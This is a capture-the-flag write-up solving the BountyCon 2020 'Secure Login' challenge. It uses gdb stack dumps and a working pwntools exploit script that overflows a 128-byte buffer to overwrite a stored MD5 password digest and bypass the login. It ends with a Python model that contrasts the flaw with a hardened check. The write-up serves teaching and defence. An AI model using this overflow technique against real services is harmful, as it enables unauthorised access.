Secure Login - Facebook BountyCon 2020
This was the only pwn challenge in Facebook BountyCon 2020; here is how I solved it.
The description:
We developed a super secure login system, but unfortunately we aren't familiar with those newfangled memory-safe languages.
We are given a 64-bit ELF binary:
./secure_login: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, BuildID[sha1]=e04815d2376518cc8b4295463f91479b57b8212a, for GNU/Linux 3.2.0, not stripped
It is a PIE ("shared object", which is why the code addresses in gdb later start with 0x5555...) and it is not stripped, so function names are available.
After opening it in IDA, I found the following functions:
- 0x0000000000001269 wait_for_zombie
- 0x0000000000001291 check_passwd
- 0x0000000000001414 take_connections_forever
- 0x00000000000014dc main
Let's look at the check_passwd() function in the decompiler.
It looks like our input is compared against v17; I assume v17 and v18 are really one 16-byte variable, since what is being compared is an MD5 digest.
Next, take_connections_forever(). It accepts a connection and forks; the child closes the listening socket a1 and runs check_passwd() on the client socket v2:
    if ( !fork() )
    {
        close(a1);
        check_passwd(v2);
    }
Because check_passwd() runs in the child, we have to follow the child process to debug it. In gdb that is done with
    set follow-fork-mode child
and a breakpoint on check_passwd. With this setting gdb detaches from the parent (the accept loop) at the fork, so it only follows the first connection; restart the binary for each attempt, or use set detach-on-fork off to keep control of both processes.
Now let's run it. The binary listens on port 10000, so I connect to it with nc. Let's set another breakpoint on the memcmp call:
    0x00005555555553af <+286>: call 0x555555555100 <memcmp@plt>
and send AAAAAAAA as input. At the breakpoint, the 16 bytes at 0x00007fffffffdda0 are the MD5 of our input and the 16 bytes at 0x00007fffffffdd90 are the stored digest from the binary itself. Let's look at the stack from rsp:
0x7fffffffdd10: 0x4141414141414141 0x000000000000000a <-- our input
0x7fffffffdd20: 0x0000000000000000 0x0000000000000000
0x7fffffffdd30: 0x0000000000000000 0x0000000000000000
0x7fffffffdd40: 0x0000000000000000 0x0000000000000000
0x7fffffffdd50: 0x0000000000000000 0x0000000000000000
0x7fffffffdd60: 0x0000000000000000 0x0000000000000000
0x7fffffffdd70: 0x0000000000000000 0x0000000000000000
0x7fffffffdd80: 0x0000000000000000 0x0000000000000000
0x7fffffffdd90: 0xa99dd1dbed586201 0xc6bbb0b969f29e4d <-- the md5 password
0x7fffffffdda0: 0xf5f48e17c7c26f5c 0x71750fc6d47e8ca8 <-- this is md5 from our input
Now let's send 152 A's. It looks like we can control rsi and rcx; let's look at the stack again.
Our input starts at 0x7fffffffdd10 and the stored digest at 0x7fffffffdd90, so the buffer is 0x80 = 128 bytes and the 129th byte of input lands on the stored digest (that is the (152 - 32) + 8 bytes of padding in the script). Nothing stops the read at the end of the buffer, so we can overwrite 0x7fffffffdd90 with a value of our choosing. The plan is to make that value the digest the binary computes for our input, so that memcmp compares equal: read the computed digest off the stack at 0x00007fffffffdda0 at the memcmp breakpoint and put it at offset 128 of the payload. Passing the two qwords through p64 writes them to memory in the same byte order gdb displays them. Note that this only works because the 16 bytes that overwrite the stored digest do not feed into the digest the binary computes; otherwise we would be looking for an MD5 fixed point.
This is my exploit for the challenge:
from pwn import *

def main():
    # r = remote("127.0.0.1", 10000)
    r = remote("ec2-3-11-37-224.eu-west-2.compute.amazonaws.com", 10000)
    # 128 bytes of padding fill the input buffer up to the stored digest
    # at 0x7fffffffdd90 (pwntools on Python 3 needs bytes here, not str)
    p = b"A" * (152 - 32)
    p += b"A" * 8
    # overwrite the stored digest with the digest the binary computes for
    # this input, as two little-endian qwords exactly as gdb displayed them
    p += p64(0x2016e548d3b035af)
    p += p64(0x0c5b389d3383e136)
    r.sendlineafter(b":", p)
    r.interactive()

if __name__ == '__main__':
    main()
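The following Python model is an added example, not the challenge binary and not the exploit above. It reproduces the frame layout from the stack dump (input at 0x7fffffffdd10, stored digest at 0x7fffffffdd90, computed digest at 0x7fffffffdda0) to show why 128 bytes of padding followed by a chosen digest passes the check, and puts a hardened version next to it. That the binary hashes exactly the 128-byte, zero-initialised buffer is an assumption of the model, not something confirmed from the binary; the password and the frame class are constructed for the example.

```python
import hashlib
import hmac

# Addresses from the gdb stack dump at the memcmp breakpoint.
INPUT_ADDR = 0x7fffffffdd10     # start of our input
STORED_ADDR = 0x7fffffffdd90    # stored password digest
COMPUTED_ADDR = 0x7fffffffdda0  # digest computed from our input
DIGEST_LEN = 16

BUF_LEN = STORED_ADDR - INPUT_ADDR          # 0x80: bytes before the stored digest
STORED_OFF = STORED_ADDR - INPUT_ADDR
COMPUTED_OFF = COMPUTED_ADDR - INPUT_ADDR


def overflow_offset(input_addr: int, target_addr: int) -> int:
    """How many bytes of input precede the first byte that lands on target_addr."""
    return target_addr - input_addr


def hash_buffer(buf: bytes) -> bytes:
    """Model assumption: the binary hashes the whole 128-byte buffer, which the
    dump shows zero-initialised, so shorter inputs are zero-padded."""
    return hashlib.md5(buf[:BUF_LEN].ljust(BUF_LEN, b"\0")).digest()


def digest_of(password: bytes) -> bytes:
    """The value the model keeps as the stored digest for a password."""
    return hash_buffer(password)


class Frame:
    """check_passwd()'s frame from rsp: input buffer, stored digest, computed digest."""

    def __init__(self, stored_digest: bytes) -> None:
        self.mem = bytearray(COMPUTED_OFF + DIGEST_LEN)
        self.mem[STORED_OFF:STORED_OFF + DIGEST_LEN] = stored_digest

    def unbounded_read(self, data: bytes) -> None:
        # The bug: the copy is not limited to the 128-byte buffer, so input
        # bytes 128..143 replace the stored digest. (The model clips at the
        # end of the frame; the real overflow would keep writing.)
        n = min(len(data), len(self.mem))
        self.mem[:n] = data[:n]

    def buffer(self) -> bytes:
        return bytes(self.mem[:BUF_LEN])

    def stored(self) -> bytes:
        return bytes(self.mem[STORED_OFF:STORED_OFF + DIGEST_LEN])


def check_passwd_vulnerable(stored_digest: bytes, data: bytes) -> bool:
    """Model of the challenge's check: fill the buffer, hash it, memcmp against
    the digest that sits right after the buffer."""
    frame = Frame(stored_digest)
    frame.unbounded_read(data)
    computed = hash_buffer(frame.buffer())
    frame.mem[COMPUTED_OFF:COMPUTED_OFF + DIGEST_LEN] = computed
    return computed == frame.stored()      # memcmp(...) == 0


def build_payload(filler: bytes = b"A") -> bytes:
    """128 filler bytes, then the digest the check will compute for that buffer.
    The trailing 16 bytes overwrite the stored digest without changing what is hashed."""
    prefix = filler * BUF_LEN
    return prefix + hash_buffer(prefix)


def check_passwd_fixed(stored_digest: bytes, data: bytes) -> bool:
    """Hardened model: bounded copy, stored digest kept outside the writable
    buffer, constant-time comparison."""
    buf = data[:BUF_LEN]                   # never write past the buffer
    return hmac.compare_digest(hash_buffer(buf), stored_digest)


if __name__ == "__main__":
    secret = digest_of(b"correct horse battery staple")      # constructed password
    print(overflow_offset(INPUT_ADDR, STORED_ADDR))          # 128
    print(check_passwd_vulnerable(secret, b"AAAAAAAA\n"))    # False
    print(check_passwd_vulnerable(secret, build_payload()))  # True
    print(check_passwd_fixed(secret, build_payload()))       # False
```

The padding length is pure address arithmetic from the dump, which is why the script's (152 - 32) + 8 equals 128. In the hardened version the digest the attacker can reach through the buffer is no longer the reference value, so writing past the buffer no longer changes what memcmp is compared against, and hmac.compare_digest removes the timing side channel of a plain memcmp.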